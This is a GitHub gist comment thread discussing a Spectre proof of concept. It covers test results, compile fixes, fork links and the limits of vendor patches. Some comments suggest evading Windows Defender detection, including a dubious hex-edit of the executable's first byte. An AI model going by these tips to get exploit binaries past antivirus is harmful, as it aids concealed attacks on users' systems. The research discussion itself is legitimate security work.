@moonsyi yes, the process internal variant of Spectre (as in this PoC) will probably never be patched. If you want to keep some data secure from a piece of untrusted running code, you should move it outside the piece of code's process. The patches that you are running protect against 'remote sensing' of memory from other processes, and 'remote sensing' of kernel memory. |
This comment has been minimized.
This comment has been minimized.
42Bastian
commented
Jan 10, 2018
|
@MarkJurich: No OS fix can mitigate this specific exploit as it runs in the process address space. |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 10, 2018
•
|
What you say is correct, but I don't think my postings challenged them. If it appeared that way, my dearest apologies... Spectre Attacks (in research paper) can be Inter-Application (not necessarily targeting the kernel directly). Windows Updates are not restricted to OS Fixes. Firmware Updates can address some forms of attack. Software Patching (especially Signature Identification) can address immediate concerns. Is this going to stop Spectre Attacks, completely? Absolutely not (as the research paper alludes to). New Processor Designs eventually should... ... I would never say this code is reading kernel data. I mentioned it attacks itself as a demonstration. What we do know at this time, is that to start guarding against these forms of attacks (short of a new processor design), there will be much CPU overhead, and that overhead will depend on your current processor. I've read reports that some machine slowdowns as much as 30% may occur, with such solutions as speculation fencing, and that is what we have to look forward to, in the near future... Intra-Application Spectre Attacks address the core flaw in Processor Design. Let's hope we can work together to protect against Spectre until machines/boxes get replaced due to attrition, etc. |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 10, 2018
•
|
Information on Spectre [1] Spectre Attacks: Exploiting Speculative Execution [2] Google Project 0 Blog |
This comment has been minimized.
This comment has been minimized.
Menny11
commented
Jan 11, 2018
|
in order to compile the code for my Core 2 duo e8500 in windows 10 x64 I used |
This comment has been minimized.
This comment has been minimized.
apps4u
commented
Jan 11, 2018
|
I'm running on a mac os x 10.13.2 , and I was able to get the secret with a cache threshold as low as 40, But that is not the reason for this post, I installed the fix apple released today that is ment to fix this issue but I still can use this to get the secret, https://support.apple.com/en-au/HT208397 That is the link to the Security Update that said will fix spectre but it has not.
|
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 11, 2018
•
|
Have you seen this post about possibly fencing the timer calls to ensure serialization?: ... That's all I can think of, at the moment. | I was able to get results using an older Intel Penryn CPU and created a code fork in the repository. This code uses a suggestion made earlier: |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 11, 2018
•
|
Perhaps the security update in question, prevents Inter-Application Spectre Attacks, but is ineffective with Intra-Application Spectre Attacks? If that is the case, it is effectively preventing the worst type of Spectre Attacks, which is a good thing. Unfortunately, no one has published a working Spectre Attack Example on a secure/privileged segment, as far as I know, so far, so it would be difficult to test. This code is suppose to accept command arguments to possibly allow this, but no one has got it to work or showed a working example, that I know... It will be much more difficult to prevent this example code that attacks itself, as mentioned earlier... ... Sorry I can't help further, but thought I should comment. Thanks for bringing the update to our attention, though. Perhaps someone else with more knowledge will comment, soon. | Answered better in: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2317924 |
This comment has been minimized.
This comment has been minimized.
aoprea1982
commented
Jan 11, 2018
|
Ubuntu 16.04.3 LTS |
This comment has been minimized.
This comment has been minimized.
aoprea1982
commented
Jan 11, 2018
|
Kali GNU/Linux Rolling (VM)
|
This comment has been minimized.
This comment has been minimized.
spartanthe
commented
Jan 11, 2018
|
Description: macOS High Sierra 10.13.2 Supplemental Update includes security improvements to Safari and WebKit to mitigate the effects of Spectre (CVE-2017-5753 and CVE-2017-5715). They rolled out updates for the browser, not native apps. |
This comment has been minimized.
This comment has been minimized.
unzueta
commented
Jan 11, 2018
•
|
Works in Windows Build 17063 prerelease With i5-7400 CPU. It is detected by Windows defender, however. |
This comment has been minimized.
This comment has been minimized.
mikorist
commented
Jan 11, 2018
|
This is completely crazy. |
This comment has been minimized.
This comment has been minimized.
alexs77
commented
Jan 11, 2018
|
Doesn't compile here on Ubuntu 16.04 with gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.5). |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 11, 2018
•
|
It looks like the rdtscp function requires at least one argument. The original source used "&junk" as the argument. I think if you put that back in everywhere, those errors will go away. Under Win7x64/MSVS2010, I had to define junk as an unsigned int instead of int. See my previous post for other fix-ups that might lead to a clean compilation: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2316763 |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 11, 2018
|
@unzueta: Thanks for the info about Windows Defender/AV blocking it. It looks like we'll have to get a bit fancier, allowing us to continue testing with it, since MS is already kicking in Signature Detection. |
This comment has been minimized.
This comment has been minimized.
freakynit
commented
Jan 11, 2018
•
|
I was able to recover completely
|
This comment has been minimized.
This comment has been minimized.
adrb
commented
Jan 11, 2018
|
Architecture independent version, tested on ARM Allwinner H3 (not vulnerable) and Intel i7 (vulnerable): https://github.com/adrb/public/tree/master/linux/spectre_multiarch |
This comment has been minimized.
This comment has been minimized.
kuleszdl
commented
Jan 11, 2018
|
@ewheelerinc thanks for the update. As expected, it works inside VMs as well. If you got a patched KVM-Host (e.g. CentOS7) and a non-patched VM (e.g. Debian stable), could you please test if it's still exploitable in the VM? (I expect it is...) |
This comment has been minimized.
This comment has been minimized.
kuleszdl
commented
Jan 11, 2018
|
@adrb: The Allwinner H3 uses cortex A7 cores, but it's good to confirm ARM's report about A7 not being affected. |
This comment has been minimized.
This comment has been minimized.
michael-brade
commented
Jan 11, 2018
|
@kingsumos very nice find indeed! thank you! |
This comment has been minimized.
This comment has been minimized.
adrb
commented
Jan 11, 2018
|
@kuleszdl, well yes, I just had it at hand to test ;) But, as I mention, with that mod, you can test all kinds of architectures supported by Linux. |
This comment has been minimized.
This comment has been minimized.
carlosdamazio
commented
Jan 12, 2018
|
Had to tweak a little bit. 1 - PS: I'm not a low-level kind of guy, bear with me. Got the expected output, which is kind of worrying, but no point to worry about it anyways. We're fucked. |
This comment has been minimized.
This comment has been minimized.
rhalff
commented
Jan 14, 2018
•
|
Strange, works for me although I have the intel-microcode patch already installed on ubuntu: https://usn.ubuntu.com/usn/usn-3531-1/ |
This comment has been minimized.
This comment has been minimized.
hazg
commented
Jan 18, 2018
|
Intel(R) Core(TM) i3 CPU 540 @ 3.07GHz Reading 40 bytes: AMD A8-4500M APU with Radeon(tm) HD Graphics Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
HenkPoley
commented
Jan 19, 2018
|
@rhalff The microcode does not fix within process Spectre exploitation. It only adds instructions for the OS to reset the branch predictor when switching between processes. Full mitigation of within process Spectre would require disabling branch prediction all together. Leading to Intel Atom <2013 speeds, at approximately 1/6th of the performance you have now. |
This comment has been minimized.
This comment has been minimized.
spartanthe
commented
Jan 20, 2018
|
@HenkPoley The example is about in-process exploits. Browsers will fix it. I am not sure if virtual machines can be exploited this way. Somehow. |
This comment has been minimized.
This comment has been minimized.
Blastgraphic
commented
Jan 22, 2018
|
There is an error in code: |
This comment has been minimized.
This comment has been minimized.
xCuri0
commented
Feb 7, 2018
|
After changing |
This comment has been minimized.
This comment has been minimized.
nhsloyola
commented
Feb 22, 2018
|
Could someone explain what this part of code is doing? /* Time reads. Order is lightly mixed up to prevent stride prediction / |
This comment has been minimized.
This comment has been minimized.
TechnoDon
commented
Aug 3, 2018
|
Added: printf("Press Any Key to Continue\n"); End: |
This comment has been minimized.
This comment has been minimized.
TechnoDon
commented
Aug 4, 2018
•
|
i found something, if you hex edit the first byte from 4D to 00 windows defender completely ignores spectre.exe :o |
This comment has been minimized.
This comment has been minimized.
saikumarmungi
commented
Sep 12, 2019
|
Is this code supposed to work on Ubuntu 18.04 (patched)? |
This comment has been minimized.
ivan commentedJan 4, 2018
Maybe obvious, but don't add
-O2out of habit; optimization seems to break it.